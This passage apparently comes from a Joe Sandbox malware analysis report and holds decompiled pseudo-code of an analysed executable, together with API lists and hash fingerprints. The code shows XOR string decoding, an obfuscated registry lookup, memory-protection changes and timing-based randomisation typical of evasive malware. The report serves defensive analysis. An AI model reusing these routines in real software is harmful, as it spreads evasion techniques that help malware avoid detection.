                                                                    				 *((char*)(_t188 + 0x30)) = 0x6c;
                                                                    				if(_t104 >= 0x77) {
                                                                    					_t105 = _t104 ^ 0x00000042;
                                                                    					__eflags = _t105;
                                                                    				} else {
                                                                    					_t105 = _t104 ^ 0x0000001d;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x31)) = 0x2e;
                                                                    				if(_t105 >= 0x77) {
                                                                    					__eflags = _t105 ^ 0x00000042;
                                                                    				}
                                                                    				 *((char*)(_t188 + 0x34)) = 0x6d;
                                                                    				 *((char*)(_t188 + 0x3b)) = 0xd3;
                                                                    				 *((char*)(_t188 + 0x42)) = 0xd3;
                                                                    				 *((char*)(_t188 + 0x39)) = 0xd1;
                                                                    				 *((char*)(_t188 + 0x41)) = 0xd1;
                                                                    				 *((char*)(_t188 + 0x32)) = 0x63;
                                                                    				_t109 =  *(_t188 + 0x1c) + (0x00000003 -  *(_t188 + 0x1c) * _t176 & 0x00000004) * 0x65;
                                                                    				 *((char*)(_t188 + 0x33)) = 0x6f;
                                                                    				 *((char*)(_t188 + 0x35)) = 0;
                                                                    				 *((char*)(_t188 + 0x38)) = 0xd6;
                                                                    				 *((char*)(_t188 + 0x3a)) = 0xca;
                                                                    				 *((char*)(_t188 + 0x3c)) = 0xdf;
                                                                    				 *((char*)(_t188 + 0x3d)) = 0xd7;
                                                                    				 *((char*)(_t188 + 0x3e)) = 0xd2;
                                                                    				 *((char*)(_t188 + 0x3f)) = 0x90;
                                                                    				 *((char*)(_t188 + 0x40)) = 0xdd;
                                                                    				 *((char*)(_t188 + 0x43)) = 0xbe;
                                                                    				_t144 = 0;
                                                                    				do {
                                                                    					if(_t109 >= 0x77) {
                                                                    						_t109 = _t109 ^ 0x00000042;
                                                                    						__eflags = _t109;
                                                                    					} else {
                                                                    						_t109 = _t109 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t188 + _t144 + 0x38) =  *(_t188 + _t144 + 0x38) ^ 0x000000be;
                                                                    					_t144 = _t144 + 1;
                                                                    				} while (_t144 < 0xc);
                                                                    				 *((intOrPtr*)(_t188 + 0x54)) = _t188 + 0x2c;
                                                                    				 *((intOrPtr*)(_t188 + 0x50)) = _t188 + 0x20;
                                                                    				 *((intOrPtr*)(_t188 + 0x58)) = _t188 + 0x38;
                                                                    				 *(_t188 + 0x1c) = 0;
                                                                    				_t111 = E00402360();
                                                                    				 *((intOrPtr*)(_t188 + 0x48)) = _t111;
                                                                    				 *((char*)(_t111 + 0x2d)) = 1;
                                                                    				 *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x48)) + 4)) =  *((intOrPtr*)(_t188 + 0x48));
                                                                    				 *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x48)))) =  *((intOrPtr*)(_t188 + 0x48));
                                                                    				 *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x48)) + 8)) =  *((intOrPtr*)(_t188 + 0x48));
                                                                    				 *((intOrPtr*)(_t188 + 0x4c)) = 0;
                                                                    				 *((intOrPtr*)(_t188 + 0x88)) = 0;
                                                                    				E00419150(_t188 + 0x5c);
                                                                    				_t135 =  *((intOrPtr*)(_t188 + 0x13));
                                                                    				 *((char*)(_t188 + 0x88)) = 1;
                                                                    				if(_t135 >= 0x16) {
                                                                    					_t136 = _t135 + 0x8a;
                                                                    					__eflags = _t136;
                                                                    				} else {
                                                                    					_t136 = _t135 ^ 0x00000053;
                                                                    				}
                                                                    				 *((intOrPtr*)(_t188 + 0x7c)) = 0x2bf20;
                                                                    				_t185 = 0;
                                                                    				do {
                                                                    					_push(_t188 + 0x44);
                                                                    					_push( *((intOrPtr*)(_t188 + 0x50 + _t185 * 4)));
                                                                    					 *(_t188 + 0x1b) = _t136;
                                                                    					if(E004040E0( *((intOrPtr*)(_t188 + 0x98))) != 0) {
                                                                    						_t124 =  *(_t188 + 0x14);
                                                                    						if(_t124 >= 0x1d) {
                                                                    							_t125 = _t124 | 0x00000058;
                                                                    							__eflags = _t125;
                                                                    						} else {
                                                                    							_t125 = _t124 & 0x00000050;
                                                                    						}
                                                                    						 *(_t188 + 0x14) = _t125;
                                                                    						_t126 =  *((intOrPtr*)(_t188 + 0x48));
                                                                    						_t178 =  *_t126;
                                                                    						_t212 = _t178 - _t126;
                                                                    						 *((intOrPtr*)(_t188 + 0x18)) = _t178;
                                                                    						if(_t178 != _t126) {
                                                                    							while(1) {
                                                                    								E00411E30(_t136, _t188 + 0x17, 0x1d);
                                                                    								_t188 = _t188 + 4;
                                                                    								if(E00419500(_t136, _t188 + 0x64, _t212,  *((intOrPtr*)(_t178 + 0xc)), 0x19) != 0) {
                                                                    									break;
                                                                    								}
                                                                    								E00401F60(_t188 + 0x18);
                                                                    								_t178 =  *((intOrPtr*)(_t188 + 0x18));
                                                                    								if( *((intOrPtr*)(_t188 + 0x18)) !=  *((intOrPtr*)(_t188 + 0x48))) {
                                                                    									continue;
                                                                    								} else {
                                                                    								}
                                                                    								goto L60;
                                                                    							}
                                                                    							 *(_t188 + 0x1c) = 1;
                                                                    							E00419210(_t188 + 0x5c);
                                                                    						}
                                                                    					}
                                                                    					L60:
                                                                    					_t185 = _t185 + 1;
                                                                    				} while (_t185 < 3);
                                                                    				 *((char*)(_t188 + 0x88)) = 0;
                                                                    				E004194F0(_t188 + 0x5c);
                                                                    				 *((intOrPtr*)(_t188 + 0x94)) = 0xffffffff;
                                                                    				E004032C0(_t188 + 0x50, _t188 + 0x20,  *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x48)))),  *((intOrPtr*)(_t188 + 0x48)));
                                                                    				_push( *((intOrPtr*)(_t188 + 0x48)));
                                                                    				L00421F9D();
                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t188 + 0x84));
                                                                    				return  *((intOrPtr*)(_t188 + 0x20));
                                                                    			}
































                                                                    0x00413356
                                                                    0x00413358
                                                                    0x0041335d
                                                                    0x00413362
                                                                    0x00413369
                                                                    0x0041336f
                                                                    0x00413387
                                                                    0x0041338d
                                                                    0x00413394
                                                                    0x00413394
                                                                    0x0041338f
                                                                    0x0041338f
                                                                    0x0041338f
                                                                    0x0041339a
                                                                    0x0041339f
                                                                    0x004133a6
                                                                    0x004133a6
                                                                    0x004133a1
                                                                    0x004133a1
                                                                    0x004133a1
                                                                    0x004133ac
                                                                    0x004133b1
                                                                    0x004133b8
                                                                    0x004133b8
                                                                    0x004133b3
                                                                    0x004133b3
                                                                    0x004133b3
                                                                    0x004133be
                                                                    0x004133c3
                                                                    0x004133ca
                                                                    0x004133ca
                                                                    0x004133c5
                                                                    0x004133c5
                                                                    0x004133c5
                                                                    0x004133d2
                                                                    0x004133d6
                                                                    0x004133dd
                                                                    0x004133dd
                                                                    0x004133d8
                                                                    0x004133d8
                                                                    0x004133d8
                                                                    0x004133e3
                                                                    0x004133e7
                                                                    0x004133ee
                                                                    0x004133ee
                                                                    0x004133e9
                                                                    0x004133e9
                                                                    0x004133e9
                                                                    0x004133f4
                                                                    0x004133f9
                                                                    0x00413400
                                                                    0x00413400
                                                                    0x00413419
                                                                    0x00413422
                                                                    0x00413426
                                                                    0x0041342a
                                                                    0x0041342e
                                                                    0x00413433
                                                                    0x0041343a
                                                                    0x0041343a
                                                                    0x00413435
                                                                    0x00413435
                                                                    0x00413435
                                                                    0x00413440
                                                                    0x00413445
                                                                    0x0041344c
                                                                    0x0041344c
                                                                    0x00413447
                                                                    0x00413447
                                                                    0x00413447
                                                                    0x00413452
                                                                    0x00413456
                                                                    0x0041345d
                                                                    0x0041345d
                                                                    0x00413458
                                                                    0x00413458
                                                                    0x00413458
                                                                    0x00413463
                                                                    0x00413468
                                                                    0x0041346f
                                                                    0x0041346f
                                                                    0x0041346a
                                                                    0x0041346a
                                                                    0x0041346a
                                                                    0x00413475
                                                                    0x0041347a
                                                                    0x00413481
                                                                    0x00413481
                                                                    0x0041347c
                                                                    0x0041347c
                                                                    0x0041347c
                                                                    0x00413487
                                                                    0x0041348c
                                                                    0x00413493
                                                                    0x00413493
                                                                    0x0041348e
                                                                    0x0041348e
                                                                    0x0041348e
                                                                    0x00413499
                                                                    0x0041349e
                                                                    0x004134a5
                                                                    0x004134a5
                                                                    0x004134a8
                                                                    0x004134b0
                                                                    0x004134b4
                                                                    0x004134bc
                                                                    0x004134c0
                                                                    0x004134c9
                                                                    0x004134da
                                                                    0x004134de
                                                                    0x004134e2
                                                                    0x004134e7
                                                                    0x004134ec
                                                                    0x004134f1
                                                                    0x004134f6
                                                                    0x004134fb
                                                                    0x00413500
                                                                    0x00413505
                                                                    0x0041350a
                                                                    0x0041350f
                                                                    0x00413511
                                                                    0x00413514
                                                                    0x0041351b
                                                                    0x0041351b
                                                                    0x00413516
                                                                    0x00413516
                                                                    0x00413516
                                                                    0x0041351e
                                                                    0x00413523
                                                                    0x00413524
                                                                    0x00413531
                                                                    0x0041353d
                                                                    0x00413541
                                                                    0x00413545
                                                                    0x00413549
                                                                    0x0041354e
                                                                    0x00413552
                                                                    0x0041355a
                                                                    0x00413561
                                                                    0x00413567
                                                                    0x0041356a
                                                                    0x00413572
                                                                    0x00413579
                                                                    0x0041357e
                                                                    0x00413585
                                                                    0x0041358d
                                                                    0x00413594
                                                                    0x00413594
                                                                    0x0041358f
                                                                    0x0041358f
                                                                    0x0041358f
                                                                    0x00413597
                                                                    0x0041359f
                                                                    0x004135a1
                                                                    0x004135a9
                                                                    0x004135aa
                                                                    0x004135b2
                                                                    0x004135bd
                                                                    0x004135bf
                                                                    0x004135c7
                                                                    0x004135ce
                                                                    0x004135ce
                                                                    0x004135c9
                                                                    0x004135c9
                                                                    0x004135c9
                                                                    0x004135d1
                                                                    0x004135d5
                                                                    0x004135d9
                                                                    0x004135db
                                                                    0x004135dd
                                                                    0x004135e1
                                                                    0x004135e3
                                                                    0x004135eb
                                                                    0x004135f3
                                                                    0x00413604
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0041360a
                                                                    0x0041360f
                                                                    0x00413617
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00413619
                                                                    0x00000000
                                                                    0x00413617
                                                                    0x0041361f
                                                                    0x00413627
                                                                    0x00413627
                                                                    0x004135e1
                                                                    0x0041362c
                                                                    0x0041362c
                                                                    0x0041362d
                                                                    0x0041363a
                                                                    0x00413642
                                                                    0x00413658
                                                                    0x00413663
                                                                    0x0041366c
                                                                    0x0041366d
                                                                    0x00413684
                                                                    0x0041368e

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$.$a$a$g$h$i$l$y
                                                                    • API String ID: 0-2289182273
                                                                    • Opcode ID: e6d1549d04c658188e8e45351edfc813c67438686725bf5662fcdee88ccb5382
                                                                    • Instruction ID: 0119ce3c587f9a3599f6dbcdb1c4de5adfd0f7602edade6cb06f9e5fe262f468
                                                                    • Opcode Fuzzy Hash: e6d1549d04c658188e8e45351edfc813c67438686725bf5662fcdee88ccb5382
                                                                    • Instruction Fuzzy Hash: CCA1ED7104C3C09ED365CE3881806AFBBD1ABA6358F684D5FF4D5C7692C628C689CB5B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E00429AAE(void* __ecx, void* __eflags) {
                                                                    				void* _v8;
                                                                    				long _v12;
                                                                    				long _v16;
                                                                    				signed char _v23;
                                                                    				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                    				struct _SYSTEM_INFO _v80;
                                                                    				void* _v92;
                                                                    				void* _t29;
                                                                    				int _t33;
                                                                    				intOrPtr _t35;
                                                                    				void* _t43;
                                                                    				void* _t46;
                                                                    				signed int _t49;
                                                                    				void* _t54;
                                                                    				void* _t55;
                                                                    				void* _t62;
                                                                    				void* _t63;
                                                                    
                                                                    				_t29 = 4;
                                                                    				E00422920(_t29, __ecx);
                                                                    				_t55 = _t63;
                                                                    				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
                                                                    					L9:
                                                                    					_t33 = 0;
                                                                    				} else {
                                                                    					_t46 = _v44.AllocationBase;
                                                                    					GetSystemInfo( &_v80);
                                                                    					_t49 = _v80.dwPageSize;
                                                                    					_t35 =  *0x448268; // 0x2
                                                                    					_t54 = ( !(_t49 - 1) & _t55) - _t49;
                                                                    					asm("sbb esi, esi");
                                                                    					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
                                                                    					_v12 = _t49;
                                                                    					if(_t54 < _t62) {
                                                                    						goto L9;
                                                                    					} else {
                                                                    						if(_t35 == 1) {
                                                                    							_v8 = _t54;
                                                                    							goto L14;
                                                                    						} else {
                                                                    							_v8 = _t46;
                                                                    							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
                                                                    								_v8 = _v8 + _v44.RegionSize;
                                                                    								if((_v44.State & 0x00001000) == 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									_t43 = _v44.BaseAddress;
                                                                    									_v8 = _t43;
                                                                    									if((_v23 & 0x00000001) == 0) {
                                                                    										if(_t54 >= _t43) {
                                                                    											if(_t43 < _t62) {
                                                                    												_v8 = _t62;
                                                                    											}
                                                                    											VirtualAlloc(_v8, _v12, 0x1000, 4);
                                                                    											_t35 =  *0x448268; // 0x2
                                                                    											L14:
                                                                    											asm("sbb eax, eax");
                                                                    											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
                                                                    										} else {
                                                                    											goto L9;
                                                                    										}
                                                                    									} else {
                                                                    										_t33 = 1;
                                                                    									}
                                                                    								}
                                                                    								goto L15;
                                                                    							}
                                                                    							goto L9;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L15:
                                                                    				return _t33;
                                                                    			}




















                                                                    0x00429ab9
                                                                    0x00429aba
                                                                    0x00429abf
                                                                    0x00429ad0
                                                                    0x00429b49
                                                                    0x00429b49
                                                                    0x00429ad2
                                                                    0x00429ad2
                                                                    0x00429ad9
                                                                    0x00429adf
                                                                    0x00429ae2
                                                                    0x00429aee
                                                                    0x00429af5
                                                                    0x00429b00
                                                                    0x00429b04
                                                                    0x00429b07
                                                                    0x00000000
                                                                    0x00429b09
                                                                    0x00429b0c
                                                                    0x00429b6a
                                                                    0x00000000
                                                                    0x00429b0e
                                                                    0x00429b0e
                                                                    0x00429b16
                                                                    0x00429b2c
                                                                    0x00429b32
                                                                    0x00000000
                                                                    0x00429b34
                                                                    0x00429b38
                                                                    0x00429b3b
                                                                    0x00429b3e
                                                                    0x00429b47
                                                                    0x00429b4f
                                                                    0x00429b51
                                                                    0x00429b51
                                                                    0x00429b5d
                                                                    0x00429b63
                                                                    0x00429b6d
                                                                    0x00429b70
                                                                    0x00429b83
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429b40
                                                                    0x00429b42
                                                                    0x00429b42
                                                                    0x00429b3e
                                                                    0x00000000
                                                                    0x00429b32
                                                                    0x00000000
                                                                    0x00429b16
                                                                    0x00429b0c
                                                                    0x00429b07
                                                                    0x00429b89
                                                                    0x00429b90

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00429AC8
                                                                    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00429AD9
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00429B1F
                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00429B5D
                                                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 00429B83
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                    • String ID:
                                                                    • API String ID: 4136887677-0
                                                                    • Opcode ID: 9cd3f58e9d8f2c8c9c2aa7743a2e64f61b892e13c6dcf7f6dc1128023b321f3b
                                                                    • Instruction ID: d0dcd18c624419727a87dcc28abbffd8387f74cd09c14b7bced18c3b25ffbc94
                                                                    • Opcode Fuzzy Hash: 9cd3f58e9d8f2c8c9c2aa7743a2e64f61b892e13c6dcf7f6dc1128023b321f3b
                                                                    • Instruction Fuzzy Hash: 0A31A232E00229EBCF10CBA4ED54AEDBF78FB08714F541166E941E3190D675AE40DB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E0040D1C0(signed int __edx) {
                                                                    				signed int _v4;
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				signed int _v16;
                                                                    				signed int _t17;
                                                                    				signed int _t19;
                                                                    				signed int _t21;
                                                                    				signed int _t23;
                                                                    				signed int _t33;
                                                                    
                                                                    				_t33 = __edx;
                                                                    				_t17 = GetTickCount();
                                                                    				_v16 = _t17;
                                                                    				asm("rdtsc");
                                                                    				_v16 = _v16 ^ _t17 ^ _t33;
                                                                    				_t19 = GetTickCount();
                                                                    				_v12 = _t19;
                                                                    				asm("rdtsc");
                                                                    				_v12 = _v12 ^ _t19 ^ _t33;
                                                                    				_t21 = GetTickCount();
                                                                    				_v8 = _t21;
                                                                    				asm("rdtsc");
                                                                    				_v8 = _v8 ^ _t21 ^ _t33;
                                                                    				_t23 = GetTickCount();
                                                                    				_v4 = _t23;
                                                                    				asm("rdtsc");
                                                                    				_v4 = _v4 ^ _t23 ^ _t33;
                                                                    				return ((_v16 << 0x00000008 ^ _v12) << 0x00000008 ^ _v8) << 0x00000008 ^ _v4;
                                                                    			}












                                                                    0x0040d1c0
                                                                    0x0040d1ca
                                                                    0x0040d1cc
                                                                    0x0040d1d0
                                                                    0x0040d1d4
                                                                    0x0040d1d8
                                                                    0x0040d1da
                                                                    0x0040d1de
                                                                    0x0040d1e2
                                                                    0x0040d1e6
                                                                    0x0040d1e8
                                                                    0x0040d1ec
                                                                    0x0040d1f0
                                                                    0x0040d1f4
                                                                    0x0040d1f6
                                                                    0x0040d1fa
                                                                    0x0040d1fe
                                                                    0x0040d225

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick
                                                                    • String ID:
                                                                    • API String ID: 536389180-0
                                                                    • Opcode ID: 06cb277c412a19d455a6dc8df96309fc19b2975eaca1ef9b4d28768ee416dad0
                                                                    • Instruction ID: af0f3f55c9e785d9b7fd4798a08843dbdc6e664f666b2fa863c96dbff1e2f0b3
                                                                    • Opcode Fuzzy Hash: 06cb277c412a19d455a6dc8df96309fc19b2975eaca1ef9b4d28768ee416dad0
                                                                    • Instruction Fuzzy Hash: 5CF0A9319283B59F9708EF39C94518BBBE5EBC4250F54CD2EA8A5C3214E378D904DF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00412800() {
                                                                    				char _v263;
                                                                    				char _v264;
                                                                    				char _v265;
                                                                    				char _v266;
                                                                    				char _v267;
                                                                    				char _v268;
                                                                    				char _v269;
                                                                    				char _v270;
                                                                    				char _v271;
                                                                    				char _v272;
                                                                    				char _v273;
                                                                    				char _v274;
                                                                    				char _v275;
                                                                    				char _v276;
                                                                    				char _v277;
                                                                    				char _v278;
                                                                    				char _v279;
                                                                    				char _v280;
                                                                    				char _v281;
                                                                    				char _v282;
                                                                    				char _v283;
                                                                    				char _v284;
                                                                    				char _v285;
                                                                    				char _v286;
                                                                    				char _v287;
                                                                    				char _v288;
                                                                    				char _v289;
                                                                    				char _v290;
                                                                    				char _v291;
                                                                    				char _v292;
                                                                    				char _v293;
                                                                    				char _v294;
                                                                    				char _v295;
                                                                    				char _v296;
                                                                    				char _v297;
                                                                    				char _v298;
                                                                    				char _v299;
                                                                    				char _v300;
                                                                    				char _v301;
                                                                    				char _v302;
                                                                    				char _v303;
                                                                    				char _v304;
                                                                    				char _v305;
                                                                    				char _v306;
                                                                    				char _v307;
                                                                    				char _v308;
                                                                    				void* _v312;
                                                                    				void* _v324;
                                                                    				char _v328;
                                                                    				char _v340;
                                                                    				char _v344;
                                                                    				char _v347;
                                                                    				char _v348;
                                                                    				char _v349;
                                                                    				char _v350;
                                                                    				char _v351;
                                                                    				char _v352;
                                                                    				char _v353;
                                                                    				char _v354;
                                                                    				char _v355;
                                                                    				char _v356;
                                                                    				char _v357;
                                                                    				char _v358;
                                                                    				char _v359;
                                                                    				char _v360;
                                                                    				char _v361;
                                                                    				char _v362;
                                                                    				char _v363;
                                                                    				char _v364;
                                                                    				char _v372;
                                                                    				char _v376;
                                                                    				void* _v388;
                                                                    				void* _v399;
                                                                    				char _v400;
                                                                    				char _v401;
                                                                    				char _v402;
                                                                    				char _v403;
                                                                    				char _v404;
                                                                    				char _v405;
                                                                    				char _v406;
                                                                    				char _v407;
                                                                    				char _v408;
                                                                    				char _v409;
                                                                    				char _v410;
                                                                    				char _v411;
                                                                    				char _v412;
                                                                    				char _v413;
                                                                    				char _v414;
                                                                    				char _v415;
                                                                    				char _v416;
                                                                    				char _v417;
                                                                    				char _v418;
                                                                    				char _v419;
                                                                    				char _v420;
                                                                    				signed int _v428;
                                                                    				char _v432;
                                                                    				void* _v433;
                                                                    				void* _v434;
                                                                    				void* _v435;
                                                                    				intOrPtr _v436;
                                                                    				void* _v440;
                                                                    				void* _v448;
                                                                    				void* _v453;
                                                                    				void* _v454;
                                                                    				void* _v455;
                                                                    				void* _v456;
                                                                    				void* _v457;
                                                                    				void* _v458;
                                                                    				void* _v459;
                                                                    				void* _v460;
                                                                    				void* _v461;
                                                                    				void* _v462;
                                                                    				void* _v463;
                                                                    				void* _v464;
                                                                    				void* _v465;
                                                                    				void* _v466;
                                                                    				void* _v467;
                                                                    				void* _v468;
                                                                    				void* _v480;
                                                                    				void* _v485;
                                                                    				void* _v486;
                                                                    				void* _v487;
                                                                    				void* _v488;
                                                                    				void* _v489;
                                                                    				void* _v490;
                                                                    				void* _v491;
                                                                    				void* _v492;
                                                                    				void* _v493;
                                                                    				void* _v494;
                                                                    				void* _v495;
                                                                    				void* _v496;
                                                                    				void* _v497;
                                                                    				void* _v498;
                                                                    				void* _v499;
                                                                    				void* _v500;
                                                                    				void* _v512;
                                                                    				void* _v517;
                                                                    				void* _v518;
                                                                    				void* _v519;
                                                                    				void* _v520;
                                                                    				void* _v521;
                                                                    				void* _v522;
                                                                    				void* _v523;
                                                                    				void* _v524;
                                                                    				void* _v525;
                                                                    				void* _v526;
                                                                    				void* _v527;
                                                                    				void* _v528;
                                                                    				void* _v529;
                                                                    				void* _v530;
                                                                    				void* _v531;
                                                                    				void* _v532;
                                                                    				void* _v544;
                                                                    				signed int _t218;
                                                                    				signed int _t225;
                                                                    				signed int _t230;
                                                                    				signed int _t236;
                                                                    				signed int _t241;
                                                                    				signed int _t246;
                                                                    				signed int _t251;
                                                                    				signed int _t258;
                                                                    				signed int _t259;
                                                                    				void* _t272;
                                                                    				void* _t276;
                                                                    				void* _t280;
                                                                    				void* _t284;
                                                                    				void* _t288;
                                                                    				void* _t292;
                                                                    				void* _t296;
                                                                    				signed int* _t342;
                                                                    
                                                                    				_t342 =  &_v428;
                                                                    				_v304 = 0xf9;
                                                                    				_v289 = 0xf9;
                                                                    				_v287 = 0xc0;
                                                                    				_v276 = 0xc0;
                                                                    				_v268 = 0xc0;
                                                                    				_v264 = 0xc0;
                                                                    				_t217 = _v428;
                                                                    				_v295 = 0xc1;
                                                                    				_v293 = 0xc1;
                                                                    				_v285 = 0xc1;
                                                                    				_v269 = 0xc1;
                                                                    				_v296 = 0xdc;
                                                                    				_v279 = 0xdc;
                                                                    				_v278 = 0xdc;
                                                                    				_v272 = 0xdc;
                                                                    				_t218 = _v428 + (0x00000003 - _t217 *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_v308 = 0xfd;
                                                                    				_v307 = 0xe1;
                                                                    				_v306 = 0xe8;
                                                                    				_v305 = 0xfa;
                                                                    				_v303 = 0xef;
                                                                    				_v302 = 0xfc;
                                                                    				_v301 = 0xeb;
                                                                    				_v300 = 0xf2;
                                                                    				_v299 = 0xe3;
                                                                    				_v298 = 0xc7;
                                                                    				_v297 = 0xcd;
                                                                    				_v294 = 0xdd;
                                                                    				_v292 = 0xc8;
                                                                    				_v291 = 0xda;
                                                                    				_v290 = 0xf2;
                                                                    				_v288 = 0xc7;
                                                                    				_v286 = 0xca;
                                                                    				_v284 = 0xd9;
                                                                    				_v283 = 0xdd;
                                                                    				_v282 = 0xf2;
                                                                    				_v281 = 0xed;
                                                                    				_v280 = 0xdb;
                                                                    				_v277 = 0xcb;
                                                                    				_v275 = 0xda;
                                                                    				_v274 = 0xf8;
                                                                    				_v273 = 0xcb;
                                                                    				_v271 = 0xdd;
                                                                    				_v270 = 0xc7;
                                                                    				_v267 = 0xf2;
                                                                    				_v266 = 0xfc;
                                                                    				_v265 = 0xdb;
                                                                    				_v263 = 0xae;
                                                                    				_t272 = 0;
                                                                    				do {
                                                                    					if(_t218 >= 0x77) {
                                                                    						_t218 = _t218 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t218 = _t218 ^ 0x0000001d;
                                                                    					}
                                                                    					 *(_t342 + _t272 + 0x7c) =  *(_t342 + _t272 + 0x7c) ^ 0x000000ae;
                                                                    					_t272 = _t272 + 1;
                                                                    				} while (_t272 < 0x2e);
                                                                    				if(E0041C8E0(0x80000002,  &_v308,  &_v428) == 0) {
                                                                    					_t258 = _v428 + (0x00000003 - _v428 *  *0x447b60 & 0x00000004) * 0x65;
                                                                    					if(_t258 >= 0x77) {
                                                                    						_t259 = _t258 ^ 0x00000042;
                                                                    					} else {
                                                                    						_t259 = _t258 ^ 0x0000001d;
                                                                    					}
                                                                    					_t342[2] = 0x73;
                                                                    					if(_t259 >= 0x77) {
                                                                    					}
                                                                    					_t342[4] = 0x65;
                                                                    					_t342[4] = 0x72;
                                                                    					_t342[4] = 0x76;
                                                                    					_v420 = 0;
                                                                    					E0041C960(_v428,  &(_t342[2]));
                                                                    					E0041C870(_v436);
                                                                    				}
                                                                    				E0041B6C0(0,  &(_t342[0x2c]), 0x104);
                                                                    				E0041AF50( &_v272, 0, 4);
                                                                    				_t225 = _t342[1] + (0x00000003 - _t342[1] *  *0x447b60 & 0x00000004) * 0x65;
                                                                    				_v352 = 0xf5;
                                                                    				_v351 = 0x87;
                                                                    				_v350 = 0x99;
                                                                    				_v349 = 0x9e;
                                                                    				_v348 = 0x94;
                                                                    				_v347 = 0x99;
                                                                    				_t342[0x1b] = 0x82;
                                                                    				_t342[0x1b] = 0xf5;
